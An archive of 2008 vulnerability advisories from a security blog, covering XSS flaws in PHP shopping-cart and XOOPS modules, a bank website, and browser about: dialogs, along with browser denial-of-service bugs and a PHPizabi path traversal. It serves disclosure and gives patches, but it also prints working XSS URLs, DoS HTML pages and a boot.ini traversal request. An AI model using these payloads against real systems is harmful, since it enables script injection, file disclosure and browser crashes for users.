CaixaPenedes Parchea su Banca Online

Monday, November 10, 2008
#######################################
CaixaPenedes Pachea su Banca Online
vendor: http://www.caixapenedes.com
Articulo original:http://lostmon.blogspot.com/
2008/11/caixapenedes-pachea-su-banca-online.html
#######################################

La web de Caixapenedes bajo sus diferentes dominios,
se vio afectada por una serie de errores de saludación
de tipo Cross-site scripting.

Las vulnerabilidades fueron reportadas en dos fases:

En la primera se reporto, lo que se considero mas grave,
que en si era la posibilidad de poder realizar transacciones
como transferencias, sin necesidad de la tarjeta llave,
aun sin estar activada esta,el bug también funcionaba.

Esta vulnerabilidad fue descubierta por FalconDeOro y estudiada
por el y por mi hasta descubrir el como y donde funcionaba.

En la segunda fase fueron localizadas por mi unas veinte
vulnerabilidades o vectores de ataque, en la parte externa
de la web;es decir en la parte no autentificada de la web;
pero bajo el protocolo seguro https.

Las vulnerabilidades eran de tipo Cross-Site Scripting (XSS).
Dichos agujeros ,fueron reportados al equipo de seguridad logica
de caixapenedes, y al servicio de atencion al cliente,
telefonicamente y vía email ,respectivamente.



--

Descubiertas en julio del 2008
contacto inicial el 13 agosto del 2008
Pacheo completo aproximado el 20 de septiembre del 2008
hecho publico el 10 de noviembre del 2008

el primer bug no puedo decir exactamente cuando fue descubierto y
cuando fue reportado , pues todo fue telefonicamente y no tengo ninguna
fecha de referencia , pero si que es anterior a los segundos
Y que una convención de ambos podría haber sido aprovechada
por los Phishers, aunque durante el periodo de tiempo ,
que pudieron durar estas ediciones de seguridad ningún usuario/cliente
pudo verse afectado ya que todo fue reportado con la mayor discreción
posible,por ambas partes.

No se da ninguna prueba de cocepto por motivos evidentes.

Aun queda un agujero XSS pero creo que con casi tres meses de tiempo
debía haber sido tiempo suficiente para ser parcheado.

########################### €nd ################################

Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

DHCart Multiple variable XSS and stored XSS

Tuesday, November 04, 2008
###########################################
DHCart Multiple variable XSS and stored XSS
Vendor URL:http://www.dhcart.com/
Advisore:http://lostmon.blogspot.com/
2008/11/dhcart-multiple-variable-xss-and-stored.html
vendor notify:YES Exploit:YES Patch:YES
###########################################

DHCart is a PHP based application that provides a simple
to use shopping cart for users purchasing domain names
and hosting services.

DHCart is prove vulnerable to Cross site scripting and
stored cross-site scripting.

################
Solution
###############

The vendor has reported that latest version of
DHCart is 3.86 and there is no any security bug
after v3.85.

#############
see this PoC

http://Victim/order.php?dhaction=check&submit_domain=
Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2F
script%3E&ext1=on

or

http://Victim/order.php?dhaction=add&d1=lalalalasss
%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=
0&h1=1&addtocart1=on&n=3

in this case the xss is exploitable via url , and it's stored
in the cart, wen the users goes to look his cart the xss
is executed again (stored XSS)

Vulnerable code:

arround line 93 in config.php file we found:

if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = $value;

this is vulnerable because $value is returned to the users without sanitize.

i have fully pached ... add a function to filter variables and apply this filter to $value variable.


///////////////////////////////////////////////////////////////////////////
// Code below this point should not need modifying. Do so at your own risk!
///////////////////////////////////////////////////////////////////////////
function StopXSS($text)
{
if(!is_array($text))
{
$text = preg_replace("/\(\)/si", "", $text);
$text = strip_tags($text);
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
}
else
{
foreach($text as $k=>$t)
{
$t = preg_replace("/\(\)/si", "", $t);
$t = strip_tags($t);
$t = str_replace(array("'","\"",">","<","\\"), "", $t);
$text[$k] = $t;
}
}
return $text;
}

if (!empty($HTTP_GET_VARS)) while(list($name, $value) = each($HTTP_GET_VARS)) $$name = StopXSS($value);

######################€nd##################
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com
Thnx To Climbo


--
atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Multiple Browsers Stack overflow in javascript with infinite array

Sunday, November 02, 2008
##################################################
Multiple Browsers Stack overflow in javascript with infinite array
##################################################
############
Description
############

Multiple Browsers are prone vulnerables to a stack overflow
or crash via infinite array in Javascript engine.
This is a extended research from this vulnerability/exploit :
http://www.securityfocus.com/bid/31703

This issue can use for example in a web post vulnerable to xss
Style attacks or similar to do a DoS from web to Web browsers victim´s.

################
Browsers Tested:
################

Fail = affected
pass = Not affected ¿?

#####################
Testing
#####################
.:[-Multiple Browsers infnite array PoC By Lostmon -]:.
Here You have two variants of this array sav this file:
#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type="text/javascript">
function infinite_array()
{
foo = new Array();
alert('infinite array');
while(true) {foo = new Array(foo);}
}
function infinite_array2()
{
foo = new Array();
alert('Infinite array with sort()');
while(true) {foo = new Array(foo).sort();}
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type="button" value="Infinite array Without sort()" onclick="infinite_array();" />
<input type="button" value="Infinite array with sort()" onclick="infinite_array2();" />
</body></html>
####################################

###############
Stack Overflow
###############

IE7 , Avant Browser and Maxthor browsers this cause a stack
overflow in javascript.

In ie7 i try to trace and exploit it with olly debugger ,
but all cases what i test to turn it executable , are all
time go to SEH. This is not exploitable , and the browsers
wen click in the alert can continue working without problems;
them this is a recoverable issue.Microsoft security team has
determine that this issue at this moment is not exploitable.

In Google Chrome can cause a tab Crash or if we only have
open one window and one tab, open the exploit, and don´t wait,
try to navigate to google or other site causes that google
Chrome close without warning , error, or alert, if we have
open multiple tabs, this issue only crash/close the tab
affected by the exploit. If open the exploit and wait few
seconds Chrome show a warning to close the crashed tab.


################
Memory abuse
################

In ie7 can cause a memory abuse and can turn unestable all
system and all aplications.(it can load all memory)

In safari for windows can cause a program termination, safari
closes all windows, all tabs without a alert or a warning or
error.With olly , can trace , and it´s too a stack overflow.

In Google Chrome can cause a tab Crash or if we only have open
one window and one tab, open the exploit, and don´t wait, try
to navigate to google or other site causes that google Chrome
close without warning , error, or alert if open the exploit
and wait few seconds Chrome show a warning to close the
crashed tab.

Some other browsers detects the slow scripts and ask for stop.
In opera , it abuse memory , but we can recover it or navigate
to other sites them this is a recoverable issue.

#######################€nd#####################

Thnx to Microsoft security team for support & interesting.
Thnx to Apple security team for support & interesting.
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com


--
atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for widnows and Google Chrome Window.open and alert DoS

Monday, September 29, 2008
#####################################
Safari for windows and Google Chrome
Window.open & alert DoS
#####################################

Reported Here => http://code.google.com/p/chromium/issues/detail?id=2966

Product Version : 0.2.149.30 (2200)
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 3: FAIL
Firefox 3: OK
IE 7: OK

What steps will reproduce the problem?
1. Open a Malicious page with evil script code

What is the expected result?
Chrome open one window and show one alert.


What happens instead?
Chrome open all time a new window wen the users click in OK
from alert...

Please provide any additional information below. Attach a screenshot if
possible.

##########################
Evil Page with Javascript
##########################
<html>
<head></head>
<title> Chrome Window.open & alert DoS</title>
<body>
<script>
DMK = window.open(location.reload('http://lostmon.blogspot.com'));
DMK.alert(DMK)
</script>
</body>
</html>


##################€nd##############
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Filealyzer 1.6.0.4 Stak overflow

Sunday, September 28, 2008
#################################
Filealyzer 1.6.0.4 Stak overflow
Vendor url:http://www.safer-networking.org/
Advisore:http://lostmon.blogspot.com/
2008/09/filealyzer-1604-stak-overflow.html
Vendor notify:yes exploit:PRIVATE
###############################


#############################
Overview By vendor
#############################

http://www.safer-networking.org/en/filealyzer/index.html

FileAlyzer is a tool to analyze files - the name itself
was initially just a typo of FileAnalyzer, but after a
few days I decided to keep it. FileAlyzer allows a basic
analysis of files (showing file properties and file contents
in hex dump form) and is able to interpret common file
contents like resources structures (like text, graphics,
HTML, media and PE).

Using FileAlyzer is as simple as viewing the regular properties
of a file - just right-click the file you want to analyze and
choose Open in FileAlyzer.

###################
Description of bug
###################

http://forums.spybot.info/showthread.php?t=34737

Filealyzer is prone vulnerable to a stack overflow
wen parsing a malformed exe file with a malformed
version information.

The asm code reveals that the application fails
in a instruction wen try to move EAX register value
to EAX register again.




#######################
Signature for identify
#######################

This information Is of ID´s Systems
or antivirus or antispyware software
to easy detect.

filesize=327168
timestamp[file]=2008-08-26 14:24:23
md5=B84ADA93FAEB728F024687A6127B5AAB
crc32=4629A2C8
exists[authx509]=0

######################
Solution
###################

No sulution at this time !!!

##############
Time Line
##############

Discovered:02-07-2008
Vendor notify:28-09-2008
Disclosure:28-09-2008

##################€nd##############
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome Fatal Crash

Saturday, September 20, 2008
##########################
Google Chrome Fatal Crash
##########################

Product Version : 0.2.149.30 (2200)and 0.2.149.29
URLs (if applicable) :it´s indiferent.
Other browsers tested:

Safari 3: ok
Firefox 3: ok
IE 7: ok
With other browsers i can only saturate the browser.

What steps will reproduce the problem?
1. open a malformed web
2. close the tab window
3. close again the same tab window

What is the expected result?

the expected result is that Chrome close the tab and we can´t close again
the tab

What happens instead?

Chrome do a Fatal Crash :)

sing of error:

AppName: chrome.exe AppVer: 0.0.0.0 ModName: chrome.dll
13:22 ? Lostmon ¦ ModVer: 0.2.149.30 Offset: 00007b1c



After a several test i can reproduce it all time
the function source file and function involved in crash:

tab_strip_model.cc

http://src.chromium.org/viewvc/chrome/trunk/src/chrome/browser/tabs/tab_str
ip_model.cc?view=markup&pathrev=83

and the function part in the file affected is in line 561:

TabContents* TabStripModel::GetContentsAt(int index) const {
CHECK(ContainsIndex(index)) <<
"Failed to find: " << index << " in: " << count() << " entries.";
return contents_data_.at(index)->contents;
}

reported here:
http://code.google.com/p/chromium/issues/detail?id=2579

--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Thnx for your time !!!

Maxthon Browser URI about: Dialog XSS

Friday, September 05, 2008
##########################################
Maxthon Browser URI about: Dialog XSS.
Vendor URL: http://www.maxthon.com/
Advisore:http://lostmon.blogspot.com/2008/09/
avant-browser-uri-about-dialog-xss_05.html
Vendor notify:yes exploit available:yes
##########################################

##########################
Vulnerability description
##########################

Maxthon Browser contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate In the URI dialog
'about:' This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser
and the server,leading loss ofintegrity.

#################
Versions
################·

Maxthon Browser 1.6.4 built 20 Vulnerable

Maxthon Browser 2.0.2.2961 Not vulnerable

Aparently in changelog of this version (2.0.2.2961)
The vendor has change some parts of about dialog ,them,
this vulnerability its pached after this version; but
before, prior versions can be vulnerables too.


ChangeLog from Maxthon:
http://www.maxthon.com/changelog.htm



###################
Solution
###################

Update to version 2.0.2.2961 or latest built.



###################
Timeline
##################

Dicovered:16-08-2008
vendor notify:05-09-2008
Vendor response:---
Public Disclosure:----

###################
Proof of Concept.
###################

#############
Test
#############

Put in your Maxthon Broser

about:"><script>alert(1)</script>

or create a link like

<a href='about:<a href='about:"><script>alert(1)</script>'>Maxthon Browser XSS</a>

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Avant Browser URI about: Dialog XSS

##########################################
Avant Browser URI about: Dialog XSS.
Vendor URL: http://www.avantbrowser.com/
Advisory:http://lostmon.blogspot.com/2008/09/
avant-browser-uri-about-dialog-xss.html
Vendor notify:Yes exploit available:yes
##########################################

##########################
Vulnerability description
##########################

Avant Browser contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate In the URI dialog
'about:' This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser
and the server,leading loss of integrity.

#################
Versions
################·

Avant Browser 11.6 built 20 vulnerable.

Avant Browser 11.6 built 7 vulnerable


###################
Solution
###################

No Solution at this time !!!



###################
Timeline
##################

Discovered:16-08-2008
vendor notify:05-09-2008
Vendor response:---
Public Disclosure:----

###################
Proof of Concept.
###################

#############
Test
#############

Put in your Avant Broser

about:"><script>alert(1)</script>

or create a link like

<a href='about:"><script>alert(1)</script>'>Avant Browser XSS</a>

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Multiple browsers Fake files donwload Cross-site scripting

Thursday, August 28, 2008
Multiple browsers are afected by a issue wen try to download
a fake file, this is a simple study of this situation , and
how to take profit. All Browsers have a little system for
download files, wen we click in a link,and this link go to
a downloable file, the browsers show a dialog to open ,save,
or cancel the download.

Create a fake files with the follows extensions ,exe,com,jar,
bat,pdf,zip,rar,jpg,jpeg,gif,avi,wmv,wma,mpeg, and txt for
example...and inside write a javascript code like
"><script>alert(1)</script> and in the pdf file ,
write before script, the head for a pdf file %PDF- save al
files and create a html with links to fake files,for download it.

Wen we click in some of this links, some browsers fails
to determine what file type it´s and wen the file is open,
the script is executed. I have test it in tree posible
scenarios or i test the security browsers in tree Zones,
with multiple browsers , but the most important are in
the table.

Click In the image to enlarge
The first test is local file (LF) this is wen we use protocol
file:// (ej: file://c:/test/index.html) and the script is runing
with the same rights that the users logged.

The second test is in a intranet server (ID) it´s wen we visit
a page inside our intranet, and The script it´s running in the
context of security of intranet zone.

The third test is in a internet server (RD) it´s when we visit
a page outside our intranet, and The script it´s running in the
context of security ofinternet zone .

Affter test all, the most efective or secure browsers are ,
Mozilla Firefox and Flock browser, because they are non
afeccted by this issue in any zone, and the most insecure
is Avant browser and Maxthon Browser, because they are
vulnerables in the tree zones, this two browsers use explorer
modules, but explorer its vulnerable only in two zones.

This issue can use to execute XSS style attacks.

A malicious user can upload files to server or add downloads
to sites with the link to a fake file and wen a user try to
donwload it , if it navigate with a vulnerable browser in the
Zone, the script is executed with the rights of the affected Zone.

a example with moore comprensive table is available here POC

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....


http://usuarios.lycos.es/reyfuss/browsers/

PopnupBlog index.php multiple variables XSS

Monday, August 25, 2008
##########################################
PopnupBlog index.php multiple variables XSS
Vendor url:http://www.bluemooninc.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
popnupblog-indexphp-multiple-variables.html
Vendor notify:no exploits availables:yes
##########################################

PopnupBlog contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'param' , 'cat_id' and
'view' variables upon submission to 'index.php' script.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

PopnupBlog 3.20 code name: Denali

Prior versions can be vulnerables too.
it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

But you can edit the source code and ix it like:

for fix 'param' open index.php and arround line 37 we have

[code]
$params = PopnupBlogUtils::getDateFromHttpParams();
$start = PopnupBlogUtils::getStartFromHttpParams();
$view = $BlogCNF['default_view'];
$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;
[/code]

add a line to force 'param' to return a integer:

[code]
$_GET['param'] = intval($_GET['param']);
$params = PopnupBlogUtils::getDateFromHttpParams();
$start = PopnupBlogUtils::getStartFromHttpParams();
$view = $BlogCNF['default_view'];
$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;
[/code]

for fix 'cat_id' and 'view' open index.php and arround line 129 :

[code]
$xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email
$cat_id=0;
if (isset($_GET['cat_id'])) $cat_id = $_GET['cat_id'];
if (isset($_POST['cat_id'])) $cat_id = $_POST['cat_id'];
$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));
if (isset($_GET['view'])) $view = $_GET['view'];
if (isset($_POST['view'])) $view = $_POST['view'];
[/code]

add intval to force variables to return an integer like:

[code]
$xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email
$cat_id=0;
if (isset($_GET['cat_id'])) $cat_id = intval($_GET['cat_id']);
if (isset($_POST['cat_id'])) $cat_id = intval($_POST['cat_id']);
$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));
if (isset($_GET['view'])) $view = intval($_GET['view']);
if (isset($_POST['view'])) $view = intval($_POST['view']);
[/code]

###########
Examples
###########

http://localhost/modules/popnupblog/index.php?param=1
">[XSS-CODE]&start=0,10&cat_id=&view=1

http://localhost/modules/popnupblog/index.php?param=
&start=0,10&cat_id=">[XSS-CODE]&view=1

http://localhost/modules/popnupblog/index.php?param=
&start=0,10&cat_id=&view=1">[XSS-CODE]


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

PHPizabi v0.848b traversal file access

Friday, August 15, 2008
##########################################
PHPizabi v0.848b traversal file access
Vendor url:http://www.phpizabi.net/
Advisore:http://lostmon.blogspot.com/2008/08/
phpizabi-v0848b-traversal-file-access.html
Vendor notify:no exploit available:yes
##########################################

############################
Description By vendor page:
############################

PHPizabi is one of the most powerful social networking
platforms on the planet. With literally thousands of
websites powered by PHPizabi including everything from
simple friends sites to the most complex networking
super sites out there. Easy to install, use, and raising
the bar on what it is to provide a reliable, fast, social
networking package to raise your business to the next level.

##########################
Vulnerability description
##########################
PHPizabi contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'query' variable upon submission
to 'index.php' scripts wen 'L' param is set to 'blogs.search'.
This could allow a remote users to create a specially crafted
URL that would execute '../' directory traversal characters to
view folder files on the target system with the privileges
of the target web service.


#################
Versions
################·

PHPizabi v0.848b C1 HFP3


###################
Solution
###################

At this moment ,no have solution for Traversal vuln.

For solve XSS issue in search blogs update to sp3
of this system:

Download sp3:
http://online.phpizabi.net/distribution/0848bC1_HFP3.zip


###################
Timeline
##################

Dicovered:10-08-2008
vendor notify: 14-08-2008
Vendor response:
Public Disclosure:15-08-2008

###################
Proof of Concept.
###################

#############
XSS
#############

if the sito don´t have instaled 848 Core HotFix Pack 3
(0848bC1_HFP3.zip) this system have one XSS hole in query
variable upon submision to index.php script wen L param is
set to blogs.search:

http://localhost/phpizabi/index.php?L=blogs.search&query=
[XSS-CODE]boolean=or&sin%5B%5D=title&sin
%5B%5D=body&order=natural&direction=asc


#####################
Traversal file access
#####################

For exploit this issue The attacker
need a Admin account.

http://localhost/phpizabi/index.php?L=
admin.templates.edittemplate&id=../../../boot.ini

we can too 'view' the html source code generated by
a remote server like :

http://localhost/phpizabi/index.php?
L=admin.templates.edittemplate
&id=http://[Remote-HOST]/folder/file.php

but i don't know if with this we can do something...


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

FIX XSS in RMSOFT donwload plus

Monday, August 11, 2008
fixing XSS issues in RMSOFT donwload plus


RMSOFT XSS Vulnerability
report:
http://lostmon.blogspot.com/2008/08/rmsoft-downloads-plus-two-scripts-two.html

###################
FIX $key variable
###################

open modules/rmdp/include/rmdp_functions.php

arround line 314 found function rmdp_make_searchnav()

found this code:
#####################
[code]

function rmdp_make_searchnav(){
global $xoopsDB, $xoopsTpl, $xoopsModule;

$xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));
$xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);
$key = isset($_POST['key']) ? $_POST['key'] : (isset($_GET['key']) ?($_GET['key'] : '');

$xoopsTpl->assign('key', $key);
[/code]

the variable $key is vulnerable in GET & POST.
Now add htmlspecialchars() function:
change for this other:

[code]
function rmdp_make_searchnav(){
global $xoopsDB, $xoopsTpl, $xoopsModule;

$xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));
$xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);
$key = isset($_POST['key']) ? htmlspecialchars($_POST['key']) : (isset($_GET['key']) ? htmlspecialchars($_GET['key']) : '');

$xoopsTpl->assign('key', $key);
[/code]

now variable is clean in functions, but we need to sanitize again in search.php...

open modules/rmdp/search.php

arround line 37 we found two request to $key variable:
[code]
$rmdp_location = 'search';
include('header.php');
$key = $_GET['key'];
if ($key==''){ $key=$_POST['key']; }
$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);
[/code]

need a cleaning :S use again htmlspecialchars() y GET & POST
change by this other:

[code]$rmdp_location = 'search';
include('header.php');
$key = htmlspecialchars($_GET['key']);
if ($key==''){ $key=htmlspecialchars($_POST['key']); }
$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);
[/code]

$cat aparently is sanitized , but if is a numeric value allways i ithink in use intval() like :

[code]
$cat = isset($_GET['cat']) ? intval($_GET['cat']) : (isset($_POST['cat']) ? intval($_POST['cat']) : 0);
[/code]

#############################
fix $id variable in down.php
#############################

open modules/down.php and arround line 38 found this code line:

[code]$id = $_GET['id'];[/code]

it´s a numerical variable value always and them...
yo can change by this other to sanitizing :

[code]$id = intval($_GET['id']);[/code]

##############€nd ######


Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Yogurt Social Network fans.php uid variable XSS

Sunday, August 10, 2008
##########################################
Yogurt Social Network fans.php uid variable XSS
Vendor url:http://sourceforge.net/project/
showfiles.php?group_id=204109
Advisore:http://lostmon.blogspot.com/2008/08/
yogurt-social-network-fansphp-uid.html
Vendor notify:no exploits availables:yes
##########################################


Yogurt Social Network is a social network php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Yogurt Social Network contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'uid' variable upon
submission to Multiple scripts script in yogurt module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

Yogurt Social Network 3.2 rc1

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/impresscms/htdocs/modules/yogurt/fans.php?
uid=1">[XSS-CODE]

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

RMSOFT Downloads Plus two scripts two variables XSS

Saturday, August 09, 2008
##########################################
RMSOFT Downloads Plus two scripts two variables XSS
Vendor url:http://www.xoops-mexico.net/
Advisore:http://lostmon.blogspot.com/2008/08/
rmsoft-downloads-plus-two-scripts-two.html
Vendor notify:no exploits availables:yes
##########################################


RMSOFT Downloads Plus is a download php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

RMSOFT Downloads Plus contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'key' variable upon
submission to search.php script and 'id' variable upon
submision to down.php script in module. This could allow
a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

RMSOFT Downloads Plus 1.5
RMSOFT Downloads Plus 1.7

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/modules/rmdp/search.php?key=">[XSS-code]&cat=0

http://localhost/modules/rmdp/down.php?id=1">[XSS-code]

http://localhost/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">
[XSS-code]&cid=3#users


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente..

Yogurt Social Network multiple scripts uid variable XSS

##########################################
Yogurt Social Network multiple scripts uid variable XSS
Vendor url:http://sourceforge.net/project/
showfiles.php?group_id=204109
Advisore:http://lostmon.blogspot.com/2008/08/
yogurt-social-network-multiple-scripts.html
Vendor notify:no exploits availables:yes
##########################################


Yogurt Social Network is a social network php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Yogurt Social Network contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'uid' variable upon
submission to Multiple scripts script in yogurt module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

Yogurt Social Network 3.2 rc1

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/impresscms/htdocs/modules/yogurt/friends.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/seutubo.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/album.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/scrapbook.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/index.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/
tribes.php?uid=1"><script>alert(1)</script>

Also the a autenticated user can compose a new scrap with XSS code
in description texarea, and it is executed wen a user looks the
attacker malformed scrap.(stored XSS).


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

RMSOFT MiniShop module multiple variable XSS

##########################################
RMSOFT MiniShop module multiple variable XSS
Vendor url:http://redmexico.com.mx
Advisore:http://lostmon.blogspot.com/2008/08
/rmsoft-minishop-module-multiple.html
Vendor notify:no exploit available:yes
##########################################


RMSOFT MiniShop is a E-commerce php/Mysql script module
for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.




RMSOFT MiniShop contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate multiple variable upon
submission to 'search.php' script in RMSOFT MiniShop module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.


#################
Versions
################·

RMSOFT MiniShop 1.0

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

###################
Solution
###################

At this moment ,no have solution...



###################
Proof of Concept.
###################

#############
XSS
#############

vulnerable code key & idc variables in lines 35 & 36 in search.php

$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');
$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');

to fix change to:

$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');

